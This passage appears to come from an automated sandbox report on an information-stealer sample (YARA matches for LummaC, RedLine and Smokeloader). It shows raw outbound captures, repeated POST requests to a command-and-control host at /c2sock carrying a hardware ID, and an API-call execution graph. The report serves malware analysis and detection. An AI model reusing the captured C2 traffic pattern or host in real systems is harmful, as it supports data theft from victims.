                                                        Nov 13, 2024 10:52:42.333452940 CET9888OUTData Raw: 0d f0 55 fd ef db 4f e8 7f 9f 9a 31 d6 53 b7 fc a9 16 da a7 4c cf 19 7e 6f 91 6b 93 ee bb 4b e7 66 eb dc e3 e7 d5 82 eb 9e d0 df eb 55 fd bd e6 fc b3 76 9c ae bf f9 4f d1 fb f3 86 be 33 fd 1e f4 bb e4 f1 bf bc 6e d8 ad fe d7 ca 5e df 4e f7 bf 66
                                                        Data Ascii: UO1SL~okKfUvO3n^Nff^[q8`?YsW/i.0]Cx+X`u;vSo6g702-_q3&a0=?xmLpP
                                                        Nov 13, 2024 10:52:42.333494902 CET2472OUTData Raw: ae 93 7e ab 7a 7c 30 eb 3b 35 db ff 5c d7 f0 63 e2 7f f5 bb 9f f8 9f f8 5f bb fd ef ed 9c a9 77 fe 87 f8 9f f8 5f bf f6 bf 3a e7 7f 74 8c ff 25 b8 9f f8 5f 67 f8 9f 6b f6 47 64 0e 48 ce f9 1f f5 fa 9f 3d ef c3 ce 13 8e 6b f2 cc ff 88 cd 01 c9 39
                                                        Data Ascii: ~z|0;5\c_w_:t%_gkGdH=k9l@Z=c{Dwc`o_K>n?`ssfp _PCypk?>;@{]oQC]
                                                        Nov 13, 2024 10:52:42.333532095 CET1236OUTData Raw: ae 79 c0 f6 4c 60 5e 43 d8 0c ff fb eb 1c 65 0c 90 d7 00 92 01 8e 7d d1 3f 96 ed 7f ef e5 f2 bf 63 5e f8 40 cd fd d7 30 f5 c6 75 ab 26 1a 60 c3 fe 97 32 ff e3 7d 7a 0d fc 0f b1 bd ef fd e0 3a 24 66 5a 67 9e 91 db b4 dc be d5 88 69 1d d3 76 d3 2b
                                                        Data Ascii: yL`^Ce}?c^@0u&`2}z:$fZgiv+[5|UM`,x2j/:^ky}<u|TW%95?M]qC9lkcw]!t?&hsTg@;B?y=
                                                        Nov 13, 2024 10:52:42.338093042 CET1236OUTData Raw: 81 a8 03 a4 b9 20 59 fe 57 4f ff ef f9 af aa c4 1a 40 da 3e 5f 1f 8f f8 df fd 8e fa bf 47 d3 fc ef 3f ea e8 be e2 7f 67 9f a5 96 2f d7 a6 b5 78 51 98 d6 f9 df 1f 3b da fb 62 fe e7 f8 ad 4c b4 01 be 74 f9 ee 11 f7 23 e7 cb ea 11 a6 6b b8 03 52 4f
                                                        Data Ascii: YWO@>_G?g/xQ;bLt#kROpQOOWWO/_VoZ0z=5D?`3Bb|q#>h;Nu&fz=gu`=Mnp
                                                        Nov 13, 2024 10:52:42.338601112 CET4944OUTData Raw: 07 54 fc 24 d5 fd 65 f8 df fd fa 58 5a 92 fc 2f cd 01 8b f4 09 87 8e c7 92 64 7e 31 fb 23 27 64 ce 47 b3 80 31 0f 38 69 ae 07 bf 8e cf 0e 4e 5a ff 2f 34 40 c7 9a 7e e8 ef 4d ae e9 ab 16 5a ff 6f da ae 7e bd 1e 6a fd cc b6 35 ff 23 9c 01 12 f8 1f
                                                        Data Ascii: T$eXZ/d~1#'dG18iNZ/4@~MZo~j5#65,pA$pp0^i60Rg|z~w4A=jnu}_569!!Y XS.u8=}|4kQ^#
                                                        Nov 13, 2024 10:52:42.339216948 CET2472OUTData Raw: e6 7f 33 99 ff 39 6b 00 fb b8 ff d5 bb fe df 7d fb 55 4c 8a fa 9f 9d bc fe 97 6c 82 e9 fd bf 65 fb 9f 3d e3 83 fb 5f de fe 5f 1e ee 7f dc f3 60 83 dc 03 ed 6b 30 fb 03 fe 87 fe 5f db ff d0 ff eb f2 bd e9 bb 0d 8a cc ff 28 db ff b8 ed b9 6a ff 5c
                                                        Data Ascii: 39k}ULle=__`k0_(j\.KZ s@2Cs06Hu~/;<k`{mAZ@!z1>k6{?W?tn_=SK]ts?f5ON
                                                        Nov 13, 2024 10:52:42.381649017 CET25956OUTData Raw: ff b9 6a fe 90 19 74 5f 82 ff d1 36 fc 8e 3c 8f 3b 1f 02 eb 23 13 9c b4 bd 67 cc 0f 06 48 c9 f2 3f 5e 0b 48 75 7f 14 da a7 35 07 a7 ef ba 42 e2 5c 0f bb 2f 38 9c f3 1b f8 1f ac 10 d7 c0 f6 e8 15 f5 7d b4 cf 7b 7c e1 81 91 39 c0 23 7a 13 fb 7b a9
                                                        Data Ascii: jt_6<;#gH?^Hu5B\/8}{|9#z{7xql~M~Hh5}vs7D=i& m7ow[[?{$%7?\R3-$zk^~e


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.54998394.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:51.129193068 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:51.129554987 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.54998494.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:52:59.911824942 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:52:59.912281990 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.54998594.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:53:08.832735062 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:53:08.833134890 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.54998694.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:53:17.613392115 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:53:17.613775015 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.54998794.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:53:26.416662931 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:53:26.417109013 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.54998894.158.244.69807104C:\Users\user\Desktop\cgln32y2HF.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:53:35.337399960 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:53:35.337399960 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Target ID:0
                                                        Start time:04:50:49
                                                        Start date:13/11/2024
                                                        Path:C:\Users\user\Desktop\cgln32y2HF.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\cgln32y2HF.exe"
                                                        Imagebase:0x400000
                                                        File size:445'952 bytes
                                                        MD5 hash:21F41D9EC4E120F5BC7D543CDE6A9CEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2109855914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.9%
                                                          Dynamic/Decrypted Code Coverage:11.1%
                                                          Signature Coverage:51.5%
                                                          Total number of Nodes:787
                                                          Total number of Limit Nodes:26
                                                          execution_graph 73569 4102d1 73572 447a80 73569->73572 73575 44e224 73572->73575 73576 44e22f RtlFreeHeap 73575->73576 73580 4102da 73575->73580 73577 44e244 GetLastError 73576->73577 73576->73580 73578 44e251 __dosmaperr 73577->73578 73581 4447a4 14 API calls __dosmaperr 73578->73581 73581->73580 73582 4069a1 73602 4069ba __CreateFrameInfo 73582->73602 73585 40738c 73586 408a5a lstrcatW lstrcatW 73604 40e14e 73586->73604 73587 406aed lstrcatW lstrcatW 73587->73602 73588 407722 lstrcatW lstrcatW 73588->73602 73590 408a43 73627 404710 46 API calls 73590->73627 73593 405aaa 178 API calls 73593->73602 73601 4360e1 15 API calls 73601->73602 73602->73585 73602->73586 73602->73587 73602->73588 73602->73590 73602->73593 73602->73601 73603 40620b 166 API calls 73602->73603 73618 403ead 47 API calls _strlen 73602->73618 73619 404d0b 16 API calls ___from_strstr_to_strchr 73602->73619 73620 404edc 16 API calls 73602->73620 73621 4034bc 46 API calls 73602->73621 73622 403d1e 46 API calls 73602->73622 73623 40476b 99 API calls 73602->73623 73624 404710 46 API calls 73602->73624 73625 4034fd 101 API calls 73602->73625 73626 404f20 16 API calls 73602->73626 73603->73602 73616 40e172 __CreateFrameInfo 73604->73616 73605 408a85 73606 40d994 155 API calls 73606->73616 73608 40f53e lstrcatW lstrcatW lstrcatW 73608->73616 73611 40e7bc lstrcatW 73614 40e14e 155 API calls 73611->73614 73612 40e14e 155 API calls 73612->73616 73613 40b81c 43 API calls 73613->73616 73614->73616 73615 40e54f lstrcatW lstrcatW 73615->73616 73616->73605 73616->73606 73616->73608 73616->73611 73616->73612 73616->73613 73616->73615 73617 447a80 14 API calls ___vcrt_freefls@4 73616->73617 73628 40b129 73616->73628 73640 438e28 73616->73640 73648 419e6b 73616->73648 73617->73616 73618->73602 73619->73602 73620->73602 73621->73602 73622->73602 73623->73602 73624->73602 73625->73602 73626->73602 73627->73586 73638 40b13c __CreateFrameInfo 73628->73638 73629 40a928 41 API calls 73629->73638 73630 40b494 73631 40b759 NtReadFile 73634 438e28 3 API calls 73631->73634 73632 40b81c 41 API calls 73632->73638 73633 40b129 41 API calls 73633->73638 73636 40b7ab NtClose 73634->73636 73635 438e28 LoadLibraryW GetPEB lstrcmpiW 73635->73638 73636->73616 73638->73629 73638->73630 73638->73631 73638->73632 73638->73633 73638->73635 73639 447e24 15 API calls ___std_exception_copy 73638->73639 73656 40b7bb 73638->73656 73639->73638 73647 438e45 73640->73647 73641 43935b LoadLibraryW 73641->73647 73642 439535 GetPEB lstrcmpiW 73642->73647 73643 43a4fe GetPEB lstrcmpiW 73643->73647 73644 438e28 GetPEB lstrcmpiW 73644->73647 73645 43b362 GetPEB lstrcmpiW 73645->73647 73646 439136 73646->73616 73647->73641 73647->73642 73647->73643 73647->73644 73647->73645 73647->73646 73649 419e88 73648->73649 73650 41a1d4 73649->73650 73712 418b8f 73649->73712 73715 41831a 119 API calls _wctomb_s 73649->73715 73716 419496 106 API calls 3 library calls 73649->73716 73717 4137c1 16 API calls 2 library calls 73649->73717 73718 41900a 46 API calls 2 library calls 73649->73718 73650->73616 73662 40a928 73656->73662 73658 40b812 73658->73638 73660 438e28 3 API calls 73661 40b807 NtClose 73660->73661 73661->73658 73663 40a941 __CreateFrameInfo 73662->73663 73664 438e28 3 API calls 73663->73664 73674 40a956 __CreateFrameInfo 73664->73674 73665 40b02e lstrcatW lstrlenW 73665->73674 73666 40acba lstrcatW 73666->73674 73667 438e28 3 API calls 73667->73674 73669 40af6b NtCreateFile 73671 438e28 3 API calls 73669->73671 73670 40ac51 lstrlenW 73670->73674 73671->73674 73672 40ae4c 73672->73658 73672->73660 73673 40a928 38 API calls 73673->73674 73674->73665 73674->73666 73674->73667 73674->73669 73674->73670 73674->73672 73674->73673 73675 40b7bb 38 API calls 73674->73675 73676 40b129 38 API calls 73674->73676 73677 40b81c 73674->73677 73675->73674 73676->73674 73702 40b835 __fread_nolock __CreateFrameInfo 73677->73702 73678 40d352 73678->73674 73679 40d120 NtQueryDirectoryFile 73679->73702 73680 40d6a1 lstrcmpW 73680->73702 73681 40d7fe lstrlenW 73681->73702 73682 40d817 lstrlenW 73682->73702 73683 40d3c0 lstrcmpW 73683->73702 73684 40d891 lstrcmpW 73684->73702 73685 438e28 3 API calls 73696 40cced NtCreateFile 73685->73696 73686 40a928 26 API calls 73686->73702 73687 40c3a9 lstrcmpW 73687->73702 73688 40c57e lstrlenW 73688->73702 73689 438e28 3 API calls 73697 40d547 NtClose 73689->73697 73690 438e28 LoadLibraryW GetPEB lstrcmpiW 73690->73702 73691 40cc06 lstrcatW lstrcatW 73691->73702 73692 40b81c 26 API calls 73692->73702 73693 40c8cc lstrcmpW 73693->73702 73694 40c8fe lstrlenW 73694->73702 73695 40cdde lstrcatW 73695->73702 73696->73702 73697->73702 73699 40b129 26 API calls 73699->73702 73700 40c415 lstrcatW lstrcatW 73700->73702 73701 40b7bb 26 API calls 73701->73702 73702->73678 73702->73679 73702->73680 73702->73681 73702->73682 73702->73683 73702->73684 73702->73685 73702->73686 73702->73687 73702->73688 73702->73689 73702->73690 73702->73691 73702->73692 73702->73693 73702->73694 73702->73695 73702->73699 73702->73700 73702->73701 73703 447e24 73702->73703 73708 44eb6f _unexpected 73703->73708 73704 44ebad 73711 4447a4 14 API calls __dosmaperr 73704->73711 73705 44eb98 RtlAllocateHeap 73707 44ebab 73705->73707 73705->73708 73707->73702 73708->73704 73708->73705 73710 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 73708->73710 73710->73708 73711->73707 73719 418ba2 73712->73719 73714 418b9e 73714->73649 73715->73649 73716->73649 73717->73649 73718->73649 73720 418bb9 _strlen 73719->73720 73731 418c73 73719->73731 73721 447a80 ___vcrt_freefls@4 14 API calls 73720->73721 73722 418bfe 73720->73722 73720->73731 73721->73722 73723 418c33 73722->73723 73726 418cf3 73722->73726 73722->73731 73730 418c68 73723->73730 73737 415039 46 API calls 73723->73737 73725 447a80 ___vcrt_freefls@4 14 API calls 73725->73731 73726->73730 73732 44614f GetSystemTimeAsFileTime 73726->73732 73728 418e08 73734 417099 73728->73734 73730->73725 73730->73731 73731->73714 73733 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 73732->73733 73733->73728 73738 44575f 73734->73738 73736 4170be 73736->73730 73737->73730 73739 44576a 73738->73739 73740 44578d 73739->73740 73741 44577a 73739->73741 73742 44579f 73740->73742 73753 4457b2 73740->73753 73784 4447a4 14 API calls __dosmaperr 73741->73784 73786 4447a4 14 API calls __dosmaperr 73742->73786 73744 44577f 73785 44e2f7 29 API calls __wsopen_s 73744->73785 73747 4457a4 73787 44e2f7 29 API calls __wsopen_s 73747->73787 73748 4457d2 73788 4447a4 14 API calls __dosmaperr 73748->73788 73749 4457e3 73776 453aae 73749->73776 73753->73748 73753->73749 73756 4457fa 73757 4459ee 73756->73757 73796 45373d 73756->73796 73815 44e307 11 API calls __CreateFrameInfo 73757->73815 73760 4459f8 73761 44580c 73761->73757 73803 453769 73761->73803 73763 44581e 73763->73757 73764 445827 73763->73764 73765 4458ac 73764->73765 73766 445848 73764->73766 73813 4537d0 29 API calls 3 library calls 73765->73813 73810 4537d0 29 API calls 3 library calls 73766->73810 73768 4458b3 73775 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 73768->73775 73814 453a5a 29 API calls 2 library calls 73768->73814 73770 445860 73770->73775 73811 453a5a 29 API calls 2 library calls 73770->73811 73773 445879 73773->73775 73812 4537d0 29 API calls 3 library calls 73773->73812 73775->73736 73777 453aba ___scrt_is_nonwritable_in_current_image 73776->73777 73778 4457e8 73777->73778 73816 44d13d EnterCriticalSection 73777->73816 73789 453711 73778->73789 73780 453acb 73781 453adf 73780->73781 73817 453ff7 73780->73817 73829 453b02 LeaveCriticalSection __CreateFrameInfo 73781->73829 73784->73744 73785->73775 73786->73747 73787->73775 73788->73775 73790 453732 73789->73790 73791 45371d 73789->73791 73790->73756 73892 4447a4 14 API calls __dosmaperr 73791->73892 73793 453722 73893 44e2f7 29 API calls __wsopen_s 73793->73893 73795 45372d 73795->73756 73797 45375e 73796->73797 73798 453749 73796->73798 73797->73761 73894 4447a4 14 API calls __dosmaperr 73798->73894 73800 45374e 73895 44e2f7 29 API calls __wsopen_s 73800->73895 73802 453759 73802->73761 73804 453775 73803->73804 73805 45378a 73803->73805 73896 4447a4 14 API calls __dosmaperr 73804->73896 73805->73763 73807 45377a 73897 44e2f7 29 API calls __wsopen_s 73807->73897 73809 453785 73809->73763 73810->73770 73811->73773 73812->73775 73813->73768 73814->73775 73815->73760 73816->73780 73830 453b0b 73817->73830 73820 454053 73848 453bc4 73820->73848 73821 45404a 73842 453d65 73821->73842 73824 454050 73825 44e224 __freea 14 API calls 73824->73825 73826 45405e 73825->73826 73871 43d298 5 API calls ___raise_securityfailure 73826->73871 73828 45406b 73828->73781 73829->73778 73872 45af54 73830->73872 73835 453b52 73838 44e224 __freea 14 API calls 73835->73838 73836 45af54 42 API calls 73837 453b6a 73836->73837 73837->73835 73839 453b74 73837->73839 73840 453b31 73838->73840 73841 44e224 __freea 14 API calls 73839->73841 73840->73820 73840->73821 73841->73840 73843 453d75 73842->73843 73844 453769 29 API calls 73843->73844 73845 453d96 73844->73845 73887 44e307 11 API calls __CreateFrameInfo 73845->73887 73847 453ff6 73849 453bd4 73848->73849 73850 453769 29 API calls 73849->73850 73851 453bf1 73850->73851 73852 453d13 73851->73852 73854 453711 29 API calls 73851->73854 73891 44e307 11 API calls __CreateFrameInfo 73852->73891 73855 453c03 73854->73855 73855->73852 73857 45373d 29 API calls 73855->73857 73856 453d1d 73858 453c15 73857->73858 73858->73852 73859 453c1e 73858->73859 73860 44e224 __freea 14 API calls 73859->73860 73861 453c29 GetTimeZoneInformation 73860->73861 73862 453c45 73861->73862 73863 453cf0 73861->73863 73864 453c79 _wctomb_s 73862->73864 73863->73824 73888 4512d8 41 API calls 2 library calls 73864->73888 73866 453cc8 73889 453b82 43 API calls 4 library calls 73866->73889 73868 453cd9 73890 453b82 43 API calls 4 library calls 73868->73890 73870 453ced 73870->73863 73871->73828 73873 45af5f ___scrt_is_nonwritable_in_current_image 73872->73873 73874 44d13d __CreateFrameInfo EnterCriticalSection 73873->73874 73875 45af76 73874->73875 73876 45b042 42 API calls 73875->73876 73877 45af8c 73876->73877 73878 45afb5 LeaveCriticalSection 73877->73878 73879 453b2a 73878->73879 73879->73840 73880 44eb6f 73879->73880 73881 44ebad 73880->73881 73886 44eb7d _unexpected 73880->73886 73883 4447a4 __dosmaperr 14 API calls 73881->73883 73882 44eb98 RtlAllocateHeap 73884 44ebab 73882->73884 73882->73886 73883->73884 73884->73835 73884->73836 73885 44e560 _unexpected EnterCriticalSection LeaveCriticalSection 73885->73886 73886->73881 73886->73882 73886->73885 73887->73847 73888->73866 73889->73868 73890->73870 73891->73856 73892->73793 73893->73795 73894->73800 73895->73802 73896->73807 73897->73809 73898 43c910 73899 43c91c ___scrt_is_nonwritable_in_current_image 73898->73899 73924 43cbbb 73899->73924 73901 43c923 73902 43ca76 73901->73902 73913 43c94d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 73901->73913 73947 43ce95 4 API calls 2 library calls 73902->73947 73904 43ca7d 73940 443854 73904->73940 73908 43ca8b 73909 43c96c 73910 43c9ed 73932 43ce0e GetStartupInfoW _wctomb_s 73910->73932 73912 43c9f3 73933 42f1a8 73912->73933 73913->73909 73913->73910 73943 44389e 41 API calls 3 library calls 73913->73943 73918 43ca0f 73918->73904 73919 43ca13 73918->73919 73920 43ca1c 73919->73920 73945 443880 23 API calls __CreateFrameInfo 73919->73945 73946 43cbf4 77 API calls ___scrt_uninitialize_crt 73920->73946 73923 43ca24 73923->73909 73925 43cbc4 73924->73925 73949 43d0b8 IsProcessorFeaturePresent 73925->73949 73927 43cbd0 73950 43d5c2 10 API calls 2 library calls 73927->73950 73929 43cbd5 73930 43cbd9 73929->73930 73951 43d5e1 7 API calls 2 library calls 73929->73951 73930->73901 73932->73912 73934 42f1ad 73933->73934 73952 4244e4 GetPEB 73934->73952 73956 42d658 73934->73956 73981 4245ec 73934->73981 73990 422177 73934->73990 73935 42f1bd 73944 43ce3f GetModuleHandleW 73935->73944 74361 443a0a 73940->74361 73943->73910 73944->73918 73945->73920 73946->73923 73947->73904 73948 44386a 23 API calls __CreateFrameInfo 73948->73908 73949->73927 73950->73929 73951->73930 73953 424502 73952->73953 73955 4245d2 NtSetInformationThread 73953->73955 73998 4279e0 73953->73998 73955->73935 73977 42d66d 73956->73977 73957 42d658 281 API calls 73957->73977 73958 422177 58 API calls 73958->73977 73959 42f19d 73959->73935 73960 4269e4 GetPEB GetPEB 73960->73977 73962 4244e4 3 API calls 73962->73977 73966 42f1c2 GetPEB NtClose GetPEB 73966->73977 73968 419b9d 72 API calls 73968->73977 73969 4245ec 58 API calls 73969->73977 73971 42f265 GetPEB 73971->73977 73972 40e14e 161 API calls 73972->73977 73975 41a28f 182 API calls 73975->73977 73977->73957 73977->73958 73977->73959 73977->73960 73977->73962 73977->73966 73977->73968 73977->73969 73977->73971 73977->73972 73977->73975 73979 4360e1 15 API calls 73977->73979 74003 402fcc LoadLibraryA LoadLibraryA 73977->74003 74013 401ff9 73977->74013 74024 402476 73977->74024 74037 430228 73977->74037 74050 436adc 73977->74050 74067 434080 73977->74067 74083 433c10 73977->74083 74093 421eeb 73977->74093 74099 4224a3 73977->74099 74105 42cfba 73977->74105 74116 4262a1 73977->74116 73979->73977 73984 424605 73981->73984 73982 4247ff NtQuerySystemInformation 73982->73984 73983 4247b0 GetPEB 73983->73984 73984->73982 73984->73983 73985 4224a3 GetPEB NtQueryInformationProcess GetPEB 73984->73985 73986 4279e0 GetPEB 73984->73986 73987 424980 73984->73987 73988 4262a1 56 API calls 73984->73988 73989 422177 56 API calls 73984->73989 73985->73984 73986->73984 73987->73935 73988->73984 73989->73984 73992 422191 73990->73992 73991 42245b GetPEB 73991->73992 73992->73991 73993 422398 NtQueryInformationProcess 73992->73993 73994 4279e0 GetPEB 73992->73994 73996 422491 73992->73996 74359 41f916 GetPEB VirtualQuery 73992->74359 74360 41ebeb 58 API calls 73992->74360 73993->73992 73994->73992 73996->73935 73999 4279fe 73998->73999 74001 428317 73999->74001 74002 428334 GetPEB 73999->74002 74001->73953 74002->73999 74012 402ff9 74003->74012 74004 403349 74005 402fcc 6 API calls 74004->74005 74006 40112c 6 API calls 74004->74006 74004->74012 74133 40112c 8 API calls __aullrem 74004->74133 74005->74004 74006->74004 74007 4033ee 74007->73977 74008 402fcc 6 API calls 74008->74012 74009 402476 6 API calls 74009->74012 74011 401ff9 6 API calls 74011->74012 74012->74004 74012->74007 74012->74008 74012->74009 74012->74011 74014 40200e 74013->74014 74015 402426 ExitProcess 74014->74015 74016 402083 74014->74016 74017 402fcc 6 API calls 74014->74017 74019 401c1e 6 API calls 74014->74019 74021 402221 74014->74021 74134 401c1e 74014->74134 74016->74014 74018 40112c 6 API calls 74016->74018 74017->74014 74018->74016 74019->74014 74021->73977 74022 4020ce Sleep 74023 401c1e 6 API calls 74022->74023 74023->74014 74026 402482 74024->74026 74025 402af0 GetComputerNameW 74025->74026 74026->74025 74027 402be1 GetUserNameW 74026->74027 74028 401ff9 6 API calls 74026->74028 74030 402b69 74026->74030 74032 402555 74026->74032 74034 402fcc 6 API calls 74026->74034 74035 401c1e 6 API calls 74026->74035 74036 402476 6 API calls 74026->74036 74027->74026 74028->74026 74029 401ff9 6 API calls 74029->74032 74030->73977 74030->74030 74031 402476 6 API calls 74031->74032 74032->74026 74032->74029 74032->74031 74033 40112c 6 API calls 74032->74033 74033->74032 74034->74026 74035->74026 74036->74026 74045 43023b __CreateFrameInfo 74037->74045 74038 4309a8 74038->73977 74039 42f278 206 API calls 74039->74045 74040 42fd35 206 API calls 74040->74045 74041 430228 206 API calls 74041->74045 74042 42f625 206 API calls 74042->74045 74043 447e24 ___std_exception_copy 15 API calls 74043->74045 74044 438e28 3 API calls 74044->74045 74045->74038 74045->74039 74045->74040 74045->74041 74045->74042 74045->74043 74045->74044 74046 40b81c 43 API calls 74045->74046 74047 447a80 ___vcrt_freefls@4 14 API calls 74045->74047 74049 40b7bb 43 API calls 74045->74049 74141 41f9a4 74045->74141 74046->74045 74047->74045 74049->74045 74063 